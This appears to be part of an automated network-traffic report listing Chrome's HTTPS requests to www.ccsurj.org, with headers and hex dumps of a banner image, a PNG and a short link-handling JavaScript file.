                                          2025-01-12 00:17:04 UTC96INData Raw: c3 12 ad 40 f3 37 c4 4d 8b 74 ed 33 bb c4 7b 63 44 8a 53 b3 e5 1a de 27 43 a0 f5 c4 89 3d 59 68 39 50 f9 6e 13 ff 61 ff d5 49 4e 7d cd bd b1 e9 2f 63 68 4d 25 2b f3 56 67 db 2e d9 1d 4e 1c 6e e0 eb cd 8d 96 f5 1d fc fa 15 f8 2f 1d 03 0c 96 2f e7 ee c5 00 00 00 00 49 45 4e 44 ae 42 60 82
                                          Data Ascii: @7Mt3{cDS'C=Yh9PnaIN}/chM%+Vg.Nn//IENDB`


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          61192.168.2.449812154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:04 UTC377OUTGET /images/21/11/25/1p6vg4xelj/banner-4.jpg HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:05 UTC304INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:05 GMT
                                          Content-Type: image/jpeg
                                          Content-Length: 357315
                                          Last-Modified: Fri, 10 Jan 2025 07:04:24 GMT
                                          Connection: close
                                          ETag: "6780c678-573c3"
                                          Expires: Tue, 11 Feb 2025 00:17:05 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:05 UTC16080INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 02 02 02 02 02 02 02 02 02 02 02 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 01 78 04 b0 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 02 02 03 01 01 01 01 00 00 00 00 00 00 00 00 06 07 05 08 03 04 09 02 01 00 0a ff c4 00 4f 10 00 01 04 01 02 04 04 05 01 06 03 06 03 06 01 0d 02 01 03 04 05 06 11 12 00 07 13 21 14 22 31 41 08 15 23 32 51 61 16 24 33
                                          Data Ascii: JFIFHHCCxO!"1A#2Qa$3
                                          2025-01-12 00:17:05 UTC16384INData Raw: 15 4d 38 e5 eb 3f 59 7b c4 c2 e7 6f 7c b2 df 32 ae 2a 2a a3 0c 11 b6 d6 e9 9d 97 3c 73 2e 6a 56 d6 dc d6 cf 85 8e d8 49 6c 23 47 c6 ee e9 72 08 8e d3 34 ed 2a 56 93 2b 24 9c 73 73 a9 2c cc 15 e6 dc 0d 76 1f 4d b1 53 ef a9 29 f8 5b 1c f2 5e 04 60 e7 91 b9 0e 04 67 98 f9 59 73 ef 71 0d c6 6f 7f 92 8f e5 e7 2a 64 e5 1c ca 67 3c bd 98 56 d8 7c 91 76 bf 22 a0 ac 61 96 ae 21 4a 08 7f bb 37 63 1e 7a 30 1d 17 09 40 ba 8c 29 a1 a2 6d 03 53 45 e3 2a b8 cc 14 90 18 ae 03 88 24 13 9b 4e 79 dc 8d d2 e5 9d a4 97 39 a9 38 1c 8f 77 0a 8d 2e 1e 7b 7c f6 0b 99 cf 8a f5 86 1f cb a8 d2 35 9a ea 39 19 06 2d f2 8c 37 9c 3a c6 16 43 7a 92 9a a2 10 8a 21 2a 2a ae 8c c9 c5 df 33 63 fd 34 4d 91 8e 23 13 b1 0c 2c 07 3f fc 8d b6 40 30 06 6b b2 ea 47 c1 b6 1e 19 ad 39 f3 22 6d 46 39
                                          Data Ascii: M8?Y{o|2**<s.jVIl#Gr4*V+$ss,vMS)[^`gYsqo*dg<V|v"a!J7cz0@)mSE*$Ny98w.{|59-7:Cz!**3c4M#,?@0kG9"mF9
                                          2025-01-12 00:17:05 UTC16384INData Raw: 71 fe 7b f2 ea be f7 ce e2 44 bf 8f 69 5f 1f a8 89 f4 d1 65 ac 6e 98 f7 ec aa 9a e9 eb fa 71 b6 d1 13 91 70 08 52 f1 47 dc 91 19 23 c4 7c c5 ee 92 f9 97 c3 bf c4 3f 32 27 b7 fb 2b 9f 72 3b 38 c7 df 89 30 26 d0 e1 f9 94 42 57 ca 4d 7a 32 28 e3 72 55 a3 7b 6c 85 22 4d e5 e9 a7 64 5e 2d 21 a5 63 07 77 33 cf cd 72 bc 46 ae ae a3 de bb 5b ca c4 0f e7 cd 26 87 e1 33 e2 8b 07 ab ab 62 e3 92 99 d4 d9 30 e6 24 7a f7 60 46 6e d5 23 b4 d3 23 d1 7f 4a f9 0e f9 5b 73 cc 9a 7d ca 9a 7b af 13 92 37 76 97 03 6f 41 50 88 5e 06 44 2b b5 85 7c 17 a3 43 27 32 f8 a4 ba ad c0 a0 4a 79 d7 28 70 1c 74 c0 ef a6 34 4b ae f9 ae b6 86 02 67 e6 d5 47 71 26 ba 2b 83 a2 22 21 fa 71 13 6f 2b b0 8e 5b df 54 f5 35 1c 95 0f b4 6d c5 f4 1e 6a c3 33 cc 9a bc 2e 90 b0 ce 47 e1 d0 39 65 8c 17
                                          Data Ascii: q{Di_enqpRG#|?2'+r;80&BWMz2(rU{l"Md^-!cw3rF[&3b0$z`Fn##J[s}{7voAP^D+|C'2Jy(pt4KgGq&+"!qo+[T5mj3.G9e
                                          2025-01-12 00:17:05 UTC16384INData Raw: d2 d9 27 a2 98 4c e7 0b e5 b5 f6 f2 43 15 75 51 15 ee 60 66 5f 2e 83 1f 1b c2 da 48 39 1b 32 9d 9d 33 a8 76 26 f4 69 30 21 bd 09 1a 61 86 e5 79 ba 44 fa ab 42 5a 8a fd c8 bc 1e 2e c0 3c b8 3f 11 6f 4b 01 cb f1 d5 6e 06 c0 d7 62 6b af cf 90 fc 28 0a 18 af e3 f6 d5 83 63 6b 5d 8d b9 66 92 a9 9a 94 e6 f6 5b 90 d4 df 1c b5 6a 65 b7 d5 c3 91 1f a4 9b 53 45 5d ab a2 8e bc 5c c9 30 7b 31 37 31 ae 5c b7 56 61 e0 37 25 eb 37 6d 69 1c a4 a4 b1 9e fe 07 43 40 c5 73 b2 9f 37 9a 5f 0a f2 3a 8b e1 9f 90 eb ee 2e f9 0e 2e c6 fa 8a a6 0a 3d 42 4d 35 5e 10 a1 9e 19 c1 7b 5b 67 67 ff 00 77 44 16 bd ae 17 c3 9f cd 4c 43 c2 f3 1c 98 65 2b f2 28 aa 12 f2 4b 70 d2 25 ab ee b1 57 49 16 3c 71 93 5d 05 e6 d9 71 a5 20 02 6f ad e2 c9 77 a6 82 bd 94 d0 78 4a ab b1 7c 8d 90 0f fb ad
                                          Data Ascii: 'LCuQ`f_.H923v&i0!ayDBZ.<?oKnbk(ck]f[jeSE]\0{171\Va7%7miC@s7_:..=BM5^{[ggwDLCe+(Kp%WI<q]q owxJ|
                                          2025-01-12 00:17:05 UTC16384INData Raw: 1c 46 9a 27 b2 67 77 d2 f5 6f 8d e0 59 a8 fb 99 35 59 97 30 b9 5b 9f f2 eb 1e e5 f5 73 35 76 d4 72 da 60 5a 82 ea 10 b8 8d ab 8d 92 3b 28 b5 42 52 04 d1 7d 78 7d 8c 8c 1b b9 d9 a4 c5 f4 b6 4b 86 b4 16 9f 2b 98 f6 fd ca 56 11 3c 3b ad a2 2a aa b8 2a 87 b7 fb 28 ae bc 72 b5 30 e2 36 1b 2e fb 83 57 36 07 78 85 6f fe 13 33 6c 5f 22 cf 2c f1 0b db 2b 0a c6 ed 69 df 2a 67 a2 c7 17 c8 e4 c7 24 78 9a 22 22 04 44 50 dc 49 aa f0 c7 0e 8a 4a 69 81 1a 1d 50 bd a5 aa 6d 54 20 72 2a e8 db e3 d4 8d ba a1 5d 6e 37 0d 0a 7e f0 fa c4 75 a5 6d 7f cc 6b bc 17 fa 89 69 c7 5c c9 09 d7 25 e7 6e 6e 7c d0 7d ad 1b 90 fa 4b 22 30 f4 5f 45 e8 ba ca 8b 8d 9f e8 84 3d bb 7b f0 48 cd f4 59 27 77 50 82 e5 d7 c5 03 43 69 b5 8a e3 7f 6b fb d5 b2 15 f6 51 24 51 d3 82 11 75 16 be c5 6c 47
                                          Data Ascii: F'gwoY5Y0[s5vr`Z;(BR}x}K+V<;**(r06.W6xo3l_",+i*g$x""DPIJiPmT r*]n7~umki\%nn|}K"0_E={HY'wPCikQ$QulG
                                          2025-01-12 00:17:05 UTC16384INData Raw: d5 92 8e 57 4a 1c eb 97 3b 99 d7 c4 72 49 49 0b ee 5e 75 d0 6f 7f 14 9a bc b5 c4 6f 5a 15 af b2 b8 b7 92 90 dd 6e 2c 87 19 87 55 e0 dd 32 d5 16 44 a2 14 17 d9 6d 15 43 a1 a8 6c ed a6 ee 3a 2a 4a 49 a1 6d 8b 5a df a7 c1 74 bc 33 8f d4 50 58 c7 1b 59 cf f7 07 79 6d 7e 8b 51 db aa 97 57 02 af a5 cd 32 09 a7 7d 22 15 3e 59 19 98 61 05 da ed c2 2c 14 88 52 98 24 66 4b 62 06 a2 04 e0 21 af da e2 ae 88 bc 35 23 09 bb 8b 6f 61 71 d4 85 5d 3c 9d bc 8e 99 c0 67 73 6b 6e ac 3e 2d 19 8a 4c 9e 65 3c d8 ad 64 f2 b1 f8 d6 70 31 c7 00 de 81 16 7d 9c 51 27 23 3f 3e 3c a6 c1 4f 71 0a bb d3 d7 54 d3 cc e3 61 eb c7 43 2b aa 9a 5e de e6 2d 46 44 b7 c0 8b ae 76 99 b7 92 ec cf a7 24 15 c9 6c 5e 35 fb 75 56 79 a5 bd 9c 6a 9b e9 96 59 20 d9 45 8e eb d6 c4 80 ae 46 8b 0d ad 84 2e
                                          Data Ascii: WJ;rII^uooZn,U2DmCl:*JImZt3PXYym~QW2}">Ya,R$fKb!5#oaq]<gskn>-Le<dp1}Q'#?><OqTaC+^-FDv$l^5uVyjY EF.
                                          2025-01-12 00:17:05 UTC16384INData Raw: 5d 1a 82 a1 93 3d e2 42 70 83 95 c6 1b 5c 5a db 5f 9f 9e a8 91 54 34 5c 6e 42 53 fc 70 5c 72 da a2 ce 35 77 25 2a 60 b3 1e 95 98 2d 65 f5 b8 fb 62 d5 03 36 8e b9 b2 b1 a9 8f b0 4b 15 c9 4d 91 b9 b3 6f 64 f6 52 54 5d a4 31 b4 cb dd d3 e5 7f ca 97 e9 bf a7 8c eb f3 ff 00 0a 23 91 77 5c b8 0e 5c da a6 49 9d 67 16 b8 85 e8 38 f4 9f 87 ba 1a 78 f7 36 b6 ce 57 bb b2 64 d7 0d c8 ee a3 12 55 d3 fa eb 08 44 48 c0 55 1d df c1 a4 c3 a6 be b7 3b 25 9a 5d 7d 57 34 6e b2 66 df 1c ba 9a 8a bd ba 4a 2b 9c ad fb b8 50 3a 48 92 1a 67 42 65 88 c6 64 84 68 2d 87 6d bb b4 dc 9d d3 54 d7 8b 2e 1f 07 69 84 bb 65 4b c6 a5 c1 93 74 59 2c f3 cc d1 ec 77 f6 7a 45 cc 87 aa ba 88 e2 45 40 14 33 71 7b 22 ef 14 42 55 f6 ff 00 a7 1d 0c 90 8b 66 b9 a8 66 24 d9 4d db dc 2d 08 c8 c7 ca 64
                                          Data Ascii: ]=Bp\Z_T4\nBSp\r5w%*`-eb6KModRT]1#w\\Ig8x6WdUDHU;%]}W4nfJ+P:HgBedh-mT.ieKtY,wzEE@3q{"BUff$M-d
                                          2025-01-12 00:17:05 UTC16384INData Raw: c3 20 b1 ba d9 af 7b 59 d9 8d 3e a5 57 40 80 2d b8 91 c5 45 d0 83 a4 74 4d bd 32 32 1f b9 7d d3 76 bc 74 94 31 00 d5 c5 f1 1a a2 f9 0a 3b c0 89 96 79 89 82 3a fb 6f 84 76 ed e3 ef 74 5b 57 36 ae ed a3 e5 4e eb e6 d3 55 4f 4f 5e 1e 99 b9 25 29 08 c5 de 72 e9 f4 48 b0 e4 75 1b 9b 11 93 94 a2 4d a3 af 8a 2f a6 9d 83 4f 5f ea bc 73 44 2e e0 59 02 73 02 b2 a1 cc 62 45 07 cc f1 cc 69 9b d5 72 2c 7b 2b d9 8e 41 86 d1 f4 1c 34 13 94 02 4e 22 9b 82 22 28 28 ba af 65 ed af 09 57 48 59 19 76 b6 d8 0b 9f 20 b6 c1 9d 95 48 c1 b0 a6 b3 f9 f8 a6 21 2e 06 34 b6 ad dd 43 84 ed fd 94 d6 85 a8 8c 32 f2 c6 7d 81 47 9c 18 de 1d 7c 49 ca 73 d3 aa a0 03 d9 55 0b 84 9e 49 02 d7 cf c8 a6 64 08 5b 9a 7c bb cd b0 0e 6d e6 5c be 3a df 96 58 5a b8 e5 4d 65 64 68 af 3a b6 30 dc 74 0a
                                          Data Ascii: {Y>W@-EtM22}vt1;y:ovt[W6NUOO^%)rHuM/O_sD.YsbEir,{+A4N""((eWHYv H!.4C2}G|IsUId[|m\:XZMedh:0t
                                          2025-01-12 00:17:05 UTC16384INData Raw: 16 a8 02 d8 2e 82 82 ab aa 6a 9a 17 7d 38 f4 9a 5a 5a 3a 08 dc dc b4 cc fe e5 4f 2c 98 b3 39 95 60 22 7c 2c 0c 84 8d 69 96 5d 3f 5c d9 8c 76 d8 8e c3 7a 9c 42 3e fb dc 68 45 5a 71 11 7b 28 aa 26 a8 a9 e6 4e 29 e4 f6 e2 08 81 8e 38 c9 3e 1a 85 21 41 8c 5d e5 6f 44 f8 3b c6 20 ba 17 99 5f 33 c1 bc 7d 83 73 c5 c3 8e c3 51 22 be 85 a7 4f f8 a8 4a d2 a9 6b aa 22 2f b6 d5 ed c0 3f f5 d4 f3 38 c7 1c 59 7f 76 61 c3 a5 ad f3 4e c3 c2 23 1d e7 bf f0 98 95 d6 1c bd c5 a1 b5 8d f2 ef 97 39 0d a4 b2 9c e4 5a 8c 86 64 4d 2b 9c 7d d1 13 31 76 69 06 e2 64 91 07 44 d1 3f ca a8 bc 55 d5 d2 d7 d6 ff 00 56 79 48 6f 20 ee f2 3b 4c 2c c9 8d bf c8 26 2e 39 45 94 5c 59 d6 ac d7 69 eb ea 18 35 90 ef 2f a1 c4 58 71 dc 57 13 49 22 d1 18 ae e7 35 45 25 2d 75 f7 d7 bf 15 3d b9 64 83
                                          Data Ascii: .j}8ZZ:O,9`"|,i]?\vzB>hEZq{(&N)8>!A]oD; _3}sQ"OJk"/?8YvaN#9ZdM+}1vidD?UVyHo ;L,&.9E\Yi5/XqWI"5E%-u=d
                                          2025-01-12 00:17:05 UTC16384INData Raw: bd 06 20 47 dd 65 15 1c 8e 39 58 9b 6f c9 74 03 13 e5 6e 51 9c 81 d9 df 65 51 b2 6c 60 e4 23 94 b3 2c 76 78 64 95 21 90 8f 25 96 29 a2 c8 16 e3 04 57 07 44 07 50 d1 48 89 44 53 8e ee 9d b8 9b 63 9f 8e 9f 05 66 ea 69 3f 71 bf ae 4a 93 42 19 ed c1 c8 ea aa 98 f9 7c f8 b6 7f 2a b3 ba 6d 09 91 12 61 49 e9 a0 e3 ca 42 12 12 41 28 12 32 28 aa a7 fc c0 28 48 bc 5d 7f 00 7c 73 61 f7 81 f5 e4 83 1d 03 c9 bd c9 eb a7 8a 14 cf 9e 89 0d b8 d8 74 0a 9b 0a 2c 9b 26 89 16 25 74 16 2d 9f 93 4e 8d bd 21 b8 be 28 98 e8 c8 90 52 5d 54 e8 91 09 a0 6d 4d 00 51 75 d2 5d 99 86 2c 38 1a d0 7e 24 8f 97 82 ca 87 7e 98 60 6b 30 93 96 b7 3e 2a cc 72 06 86 ca aa 03 f7 cd 45 8f 6d 7f 4f d3 ab cb b1 43 56 a8 e5 84 b8 af 23 4e 4a 61 95 17 91 e8 f3 98 0e a2 38 e0 22 16 c1 da ea 6a ad 8d
                                          Data Ascii: Ge9XotnQeQl`#,vxd!%)WDPHDScfi?qJB|*maIBA(2((H]|sat,&%t-N!(R]TmMQu],8~$~`k0>*rEmOCV#NJa8"j


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          62192.168.2.449814154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:04 UTC368OUTGET /system/resource/js/openlink.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:05 UTC326INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:05 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 648
                                          Last-Modified: Fri, 10 Jan 2025 07:04:27 GMT
                                          Connection: close
                                          ETag: "6780c67b-288"
                                          Expires: Tue, 11 Feb 2025 00:17:05 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:05 UTC648INData Raw: ef bb bf 66 75 6e 63 74 69 6f 6e 20 5f 6f 70 65 6e 53 65 6c 65 63 74 4c 69 6e 6b 28 73 65 6c 65 63 74 6f 2c 20 6c 69 6e 6b 6e 61 6d 65 2c 20 61 64 64 63 6c 69 63 6b 74 69 6d 65 6e 61 6d 65 29 0d 0a 7b 0d 0a 20 20 20 20 69 66 28 6c 69 6e 6b 6e 61 6d 65 20 3d 3d 20 75 6e 64 65 66 69 6e 65 64 20 7c 7c 20 6c 69 6e 6b 6e 61 6d 65 20 3d 3d 20 22 22 29 0d 0a 20 20 20 20 20 20 20 20 6c 69 6e 6b 6e 61 6d 65 20 3d 20 22 76 61 6c 75 65 22 3b 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 76 61 72 20 69 6e 64 65 78 20 3d 20 73 65 6c 65 63 74 6f 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3b 0d 0a 20 20 20 20 76 61 72 20 6f 70 74 69 6f 6e 20 3d 20 73 65 6c 65 63 74 6f 2e 6f 70 74 69 6f 6e 73 5b 69 6e 64 65 78 5d 3b 0d 0a 20 20 20 20 0d 0a
                                          Data Ascii: function _openSelectLink(selecto, linkname, addclicktimename){ if(linkname == undefined || linkname == "") linkname = "value"; var index = selecto.selectedIndex; var option = selecto.options[index];


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          63192.168.2.449813154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:04 UTC636OUTGET /__local/1/3B/E2/0973C37817A5D1570D2AED02D91_1A4F1A29_14F98C.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:05 UTC305INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:05 GMT
                                          Content-Type: image/png
                                          Content-Length: 1374604
                                          Last-Modified: Fri, 10 Jan 2025 07:04:29 GMT
                                          Connection: close
                                          ETag: "6780c67d-14f98c"
                                          Expires: Tue, 11 Feb 2025 00:17:05 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:05 UTC16079INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 f4 00 00 03 b7 08 02 00 00 00 2b b0 8d 74 00 00 00 09 70 48 59 73 00 00 21 d5 00 00 21 d5 01 04 9c b4 9d 00 00 20 00 49 44 41 54 78 9c bc bd db 92 24 39 92 25 a6 0a 98 b9 47 e4 ad b2 6e 9d 59 97 ee ea ed 9e d9 91 a1 90 df 40 ae 70 c9 cf e2 13 5f f8 7f f3 07 f3 d8 2f 33 d2 95 19 e1 ee 66 d0 7d 50 c7 f1 03 55 78 54 76 ef 70 4c 4a b2 2c cc 61 80 5e 8e 2a 14 8a 8b e9 ff f7 ff fe 3f aa aa aa 66 66 66 22 22 22 a5 14 11 f1 3f 55 55 b5 7a 01 11 a9 b5 6e db b6 ef 97 cb e5 b2 2c cb e5 72 39 1e 8f e7 f3 b9 5c 5f 1c de 15 91 d6 5a 6b ad d6 5a 4a d9 f7 5d 55 6b ad 66 f6 7c 39 1f 0e 07 94 f4 7f f7 7d f7 5f 9d 06 55 f5 1a cc 6c df f7 65 59 5a 6b a5 14 33 f3 3a cd ac d6 ea 05 9c 54 af ca cc ae f7 72 bd f0 93 df a8
                                          Data Ascii: PNGIHDR+tpHYs!! IDATx$9%GnY@p_/3f}PUxTvpLJ,a^*?fff"""?UUzn,r9\_ZkZJ]Ukf|9}_UleYZk3:Tr
                                          2025-01-12 00:17:05 UTC16384INData Raw: 17 b8 e0 fa 79 44 01 2e f0 2f 73 8d 68 83 4b 86 9a 8d 46 02 3a a6 c9 24 3b 96 f4 70 fa dc fa e4 8f a5 63 ea 39 42 0a 80 09 d5 4e 61 1f 0a 64 09 4c ab 0a 72 cb 5d cf 94 0b 94 cc ad 4f e9 c9 e4 c9 98 19 f9 cd 57 c2 bb 53 7e 85 a0 7b 4f 62 10 45 a1 35 8a ee 06 7d 39 0c 17 e3 6c 5a 20 18 7f 62 f8 61 63 8c 08 f9 07 4f 12 84 a6 63 82 0f e5 39 cf c8 19 ea 29 5c 0b 4d b6 e3 21 2b 1d 69 5f 06 06 f3 c5 1c 49 1f 56 35 da d3 0b 66 3d 7a 43 8c 1b ca 70 bb ec f7 32 e5 ac 29 30 3b fd 14 8a 8c 7e 26 fb 10 28 2b 0a 61 38 e1 d5 03 09 0b 84 65 78 70 eb fe 75 16 a5 3d 93 66 e6 a9 e4 20 e7 7e 53 cc 54 44 7b a8 a9 66 2d d4 39 bd ee 29 b4 8c ab d6 33 c0 02 01 e8 0b f0 93 d2 36 78 e6 31 10 e0 b5 79 53 99 5a 47 78 51 9a b9 a2 ee 1e ff b2 45 c8 a8 b5 29 a7 ce 80 99 89 ff 37 1a 85
                                          Data Ascii: yD./shKF:$;pc9BNadLr]OWS~{ObE5}9lZ bacOc9)\M!+i_IV5f=zCp2)0;~&(+a8expu=f ~STD{f-9)36x1ySZGxQE)7
                                          2025-01-12 00:17:05 UTC16384INData Raw: 78 c0 dc 83 a9 14 c2 9c ea 1d a1 00 c3 55 1b 27 72 94 52 44 8c 63 7e 3c 25 b3 58 f6 b0 05 6c f7 f4 e5 71 09 11 1d cd 62 22 91 d6 4d d2 2e 78 0f bd c6 3d a2 29 78 68 99 2e e0 19 86 c1 f7 e8 63 26 98 55 d9 56 c3 19 b8 17 0e 09 c3 d0 8f da da 25 47 3a 56 d3 2d 55 17 17 9c 50 68 3d 76 a2 33 cc 90 72 ac d5 e3 9a da fb 42 78 e6 c0 e2 00 6c a0 00 40 28 fe 21 64 c7 16 dc 9b a5 f7 c0 70 4f b5 70 33 2d f8 5f ea 94 c9 0d 06 0a a2 b5 30 6d f4 b3 23 de 07 a6 62 a2 a4 76 a1 58 5a b9 10 72 8a 40 38 c0 d6 4f a2 b3 65 96 f3 67 3f 0c 03 61 3a a2 c2 19 50 f1 55 d8 bf d0 63 66 09 54 99 73 72 fa e9 19 ed 00 15 b3 a4 f7 e2 c0 c0 b2 47 85 c0 33 67 a0 02 e9 97 18 35 f4 1b 00 0e 6c 16 ea 6b 67 c9 bd b4 04 72 84 de d1 1d f3 09 2b 9f 25 f2 cd a2 e2 8c b6 9c ed f7 a5 95 fb 96 01 d5
                                          Data Ascii: xU'rRDc~<%Xlqb"M.x=)xh.c&UV%G:V-UPh=v3rBxl@(!dpOp3-_0m#bvXZr@8Oeg?a:PUcfTsrG3g5lkgr+%
                                          2025-01-12 00:17:05 UTC16384INData Raw: 39 c8 cb 6c 7d 3e ab 32 b8 00 b3 8d 73 e1 36 fb da dc b5 93 46 55 5f 7f fd f5 cd 66 33 8e e3 e7 9f 7f 8e c5 c0 b4 4a db ed 36 a7 95 99 0d c3 6a 1c c7 f5 7a 5b 4a b9 bd bd 7d f7 dd 77 ff e0 0f fe b3 77 de 79 b4 3f 94 52 46 df 8e 3a 4d 93 d9 e4 2b f0 5a bd 4c 2c d5 1e fb fd 86 7a 7b 96 8d bf c9 e7 a7 0e 7d 23 f1 34 1d 0f 90 7b f2 e4 c9 cf 7e f6 b3 8f 3f fe 78 b3 d9 dc de de ba 3f 7f 7b 7b eb cb 4e ae b4 99 04 be 40 35 89 81 31 a4 b2 2e 9e b1 1d 12 62 82 15 e0 54 0b 18 5a 48 c1 42 be b0 da 04 d5 c4 11 43 16 3a ad f9 23 f8 76 e0 74 5f a5 09 95 3f 56 3a 9d 0f 7a 8a 65 09 a0 4b eb 21 b3 71 8f 3a de 45 6e af 8a 91 39 99 61 11 4d ed 5e 1d 1e bf 74 0a 4e 5a 95 dd fe e4 ef 6d f4 35 b9 24 29 25 4b 62 93 a6 9c 93 c9 41 4a 52 d9 97 fd 61 9a 92 a5 67 4f af 37 97 db fd
                                          Data Ascii: 9l}>2s6FU_f3J6jz[J}wwy?RF:M+ZL,z{}#4{~?x?{{N@51.bTZHBC:#vt_?V:zeK!q:En9aM^tNZm5$)%KbAJRagO7
                                          2025-01-12 00:17:05 UTC16384INData Raw: cf 7e fa d3 7f f9 e4 93 4f 38 0e 8f 1f bd a9 d7 f9 2c 79 79 f3 ed b7 3e fc f0 c3 47 8f 1e c5 81 bf f8 e2 8b 5f fd ea 57 e3 38 46 e2 bb bb bb f5 18 70 e4 c8 a3 88 a4 3c e7 9c 6f 6f 6f 73 49 b7 a9 f9 7a c6 71 d4 9d 77 02 45 f1 64 29 97 91 7c 5c ef 14 63 98 0b ac 32 02 5b 97 5b 6b d2 72 54 cb 87 48 47 5b 18 b8 a0 2d 8d c7 90 81 db ae db 8e ba 45 bf 1a 62 8c 77 77 77 31 c6 e3 f1 a8 02 f9 e8 d1 23 81 bb a7 05 0e 34 92 2d 8e e5 cc 22 43 09 4a b1 48 ac d3 ac b3 de 91 14 e3 32 4d 94 f3 18 63 9a e7 fd 38 b2 48 5e 96 87 0f 1e 2c cb 12 6c 0a 44 6b d2 3a 95 03 fd 1d ca 13 1d 5c 28 97 dc ae f8 2a b8 b0 1d 26 da c8 8a a3 b2 bd 81 45 62 08 5c 76 5c af 98 62 26 bb f8 84 ce 99 f7 42 08 b1 3e dc 38 84 b0 30 db f5 4d b1 ec 70 56 96 3a 1f e1 30 8f 9c 28 cd b3 7d 4e 39 ef c6
                                          Data Ascii: ~O8,yy>G_W8Fp<ooosIzqwEd)|\c2[[krTHG[-Ebwww1#4-"CJH2Mc8H^,lDk:\(*&Eb\v\b&B>80MpV:0(}N9
                                          2025-01-12 00:17:05 UTC16384INData Raw: e5 53 68 d3 20 73 b9 a7 9c 31 4a 26 bc d5 ad d3 4e 51 8c 24 13 4c c7 31 77 9c ea 04 5e dc a4 66 81 51 c5 82 df b4 7b 44 e6 9b cd 64 24 1f 2b 23 e1 fe b1 44 39 6c 44 dd af bc 3f b6 92 62 cc 38 f7 e8 0e 2a 12 fc d8 88 41 ea f0 12 71 0a b7 d3 06 0f 25 cb 20 3b a5 42 9c 14 a6 46 2f b0 6b 3b 65 be 66 03 3d 48 0e 5e 62 b0 aa ea 3b 79 d0 7e 1f 69 e2 d9 1f 28 23 cb 2e 2e 9b 46 a7 65 64 5f 78 8d cd ae 4c f1 52 ca 76 db 6a ad 8e 22 d4 b7 b1 22 c7 5c e8 8e 1c 06 58 fc ea 26 b0 ef 58 9f 57 d5 4a 69 c9 d8 7b 09 08 64 b1 61 5f 34 c4 d4 81 58 0f c7 2c 7f 92 59 d9 19 79 35 40 32 f3 79 d0 98 4a 81 18 99 b7 25 83 f7 b8 b5 32 76 b3 c3 7e 00 b7 97 52 6e b7 db cf 9f 3f df df df 55 f5 f9 7c fe eb bf fe eb bf ff fb bf 73 7e 35 df 12 ef a1 e8 46 a3 00 e1 ca c8 76 16 24 2e 8c 74
                                          Data Ascii: Sh s1J&NQ$L1w^fQ{Dd$+#D9lD?b8*Aq% ;BF/k;ef=H^b;y~i(#..Fed_xLRvj""\X&XWJi{da_4X,Yy5@2yJ%2v~Rn?U|s~5Fv$.t
